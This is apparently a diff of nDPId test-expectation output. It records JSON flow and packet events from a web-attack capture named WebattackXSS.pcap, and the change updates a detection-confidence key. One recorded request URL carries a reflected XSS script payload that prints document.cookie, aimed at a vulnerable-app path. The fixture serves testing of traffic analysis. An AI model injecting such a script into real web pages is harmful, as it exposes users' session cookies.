00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -772,7 +772,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1499347230690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uy1AAD4GCqOsEAABwKgKMtbIAFCbKFPuAAAAAKACchCu1wAAAgQFtAQCCAoBOejDAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1499347230690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347230690,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1shnmPeomyhT76AScSCSVwAAAgQFtAQCCAoD47o6ATnowwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1499347230691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347230691,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uy5AAD4GCqqsEAABwKgKMtbIAFCbKFPvZ5j3qYAQAOUxXgAAAQEICgE56MQD47o6"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347228091,"flow_last_seen":1499347231733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347231733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54956,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347098746,"flow_last_seen":1499347104641,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347101314,"flow_last_seen":1499347106642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347231976,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -987,7 +987,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} 
-00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -1000,7 +1000,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} 
@@ -1207,7 +1207,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} 
@@ -1220,7 +1220,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
